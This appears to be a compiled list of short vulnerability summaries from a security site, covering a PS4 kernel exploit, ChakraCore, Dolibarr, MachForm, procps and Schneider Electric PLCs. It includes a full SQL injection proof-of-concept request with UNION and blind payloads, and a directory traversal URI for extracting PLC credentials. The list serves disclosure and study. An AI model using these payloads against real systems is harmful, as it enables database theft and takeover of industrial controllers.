This project contains a full implementation of the second 'bpf' kernel exploit for the PlayStation 4 on 5.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This exploit also contains autolaunching code for Mira and Vortex's HEN payload. The bug was discovered by qwertyoruiopz and the patches included are Disable kernel write protection, Allow RWX (read-write-execute) memory mapping, Syscall instruction allowed anywhere, Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process, Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode and Allow unprivileged users to call `setuid(0)` successfully.
The ChakraCore JavaScript engine is vulnerable to type confusion due to the lack of an ImplicitCallFlags check after the call to the EntrySimpleObjectSlotGetter method. This can lead to type confusion when the method wraps the return value using the CrossSite::MarshalVar method which traverses up the prototype chain of the given object using the GetPrototype method. If the getPrototypeOf handler of a Proxy object is changed, it can lead to type confusion.
The multiple parameters in the 'test.php' query contain SQLi vulnerabilities. PoC : SQLi : POST /release/pro_grid_big_data/php/test.php HTTP/1.1 Host: site.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://site.com/release/pro_grid_big_data/index.html Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 430 Connection: keep-alive page=1&on_home=5&table_name=be¶ms%5B0%5D%5Btype%5D=text¶ms%5B0%5D%5Bvalue%5D=¶ms%5B0%5D%5Bname%5D=Name¶ms%5B1%5D%5Btype%5D=text¶ms%5B1%5D%5Bvalue%5D=¶ms%5B1%5D%5Bname%5D=Surname¶ms%5B2%5D%5Btype%5D=num_range¶ms%5B2%5D%5Bvalue%5D%5B%5D=¶ms%5B2%5D%5Bvalue%5D%5B%5D=¶ms%5B2%5D%5Bname%5D=Age¶ms%5B3%5D%5Btype%5D=date¶ms%5B3%5D%5Bvalue%5D=¶ms%5B3%5D%5Bname%5D=Born_date&ordering=none Parameter: on_home (POST) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: page=2&on_home=5 UNION ALL SELECT CONCAT(CONCAT('qjbqq','vVWAgYsZnIsAkqERYDgZibFieBTaDlfAymtKvnaO'),'qxbpq'),NULL,NULL,NULL-- LEgG&table_name=be¶ms[0][type]=text¶ms[0][value]=¶ms[0][name]=Name¶ms[1][type]=text¶ms[1][value]=¶ms[1][name]=Surname¶ms[2][type]=num_range¶ms[2][value][]=¶ms[2][value][]=¶ms[2][name]=Age¶ms[3][type]=date¶ms[3][value]=¶ms[3][name]=Born_date&ordering=none Parameter: params[0][value] (POST) Type: boolean-basd blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=2&on_home=5 AND 5862=5862&table_name=be¶ms[0][type]=text¶ms[0][value]=¶ms[0][name]=Name¶ms[1][type]=text¶ms[1][value]=¶ms[1][name]=Surname¶ms[2][type]=num_range¶ms[2][value][]=¶ms[2][value][]=¶ms[2][name]=Age¶ms[3][type]=date¶ms[3][value]=¶ms[3][name]=Born_date&ordering=none
The 'offset' and 'db' parameters in the database table preview query has vulnerabilities. An attacker can exploit this vulnerability by sending a malicious payload to the 'offset' and 'db' parameters. The payload can be a UNION query or a Cross-Site Scripting payload.
Directory traversal in help manuals of Schneider Electric TAC Xenta 911 and 511 PLCs allows for credentials extraction. Devices are not indexed by crawlers like Shodan or Censys due to ancient SSL configuration, needed to use old browser to support it (not even s_client, curl or ncat could connect). Example URI: /www/help/public/../../../sys/pswd
An attacker can block any read() access to /proc/PID/cmdline by mmap()ing a FUSE file (Filesystem in Userspace) onto this process's command-line arguments. An attacker can hide a process from the ps and w utilities by changing the process's name to a string that contains a non-printable character. An attacker can cause top to crash by sending it a SIGWINCH signal while it is in the middle of a read() call. An attacker can cause ps to crash by sending it a SIGWINCH signal while it is in the middle of a read() call. An attacker can cause a stack-based buffer overflow in libprocps by sending a specially crafted /proc/PID/stat file to the ps utility.
Dolibarr is an 'Open Source ERP & CRM for Business' used by many companies worldwide. It is available through GitHub or as distribution packages (e.g .deb package). The application does not handle user input properly and allows execution of arbitrary SQL commands on the database. Prepared queries should be used in order to avoid SQL injection in user input.
The form creation platform MachForm from Appnitro is subject to SQL injections that lead to path traversal and arbitrary file upload. The application is widely deployed and with some google dorks it’s possible to find various webpages storing sensitive data as credit card numbers with corresponding security codes. Also, the arbitrary file upload can let an attacker get control of the server by uploading a WebShell.
A vulnerability in Yosoro 1.0.4 allows an attacker to execute arbitrary code on the target system. The vulnerability exists due to insufficient input validation in the webview component. An attacker can exploit this vulnerability by sending a specially crafted payload to the webview component. The payload contains a malicious JavaScript code that reads the /etc/passwd file and sends it to a remote server. The attacker can then use the information to gain access to the target system.
Schneider Electric PLCs are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious HTML page that contains a form with pre-filled values. When a user visits the malicious page, the form is automatically submitted and the user's credentials are changed without their knowledge. This can be used to gain access to the PLCs.
Services By CQR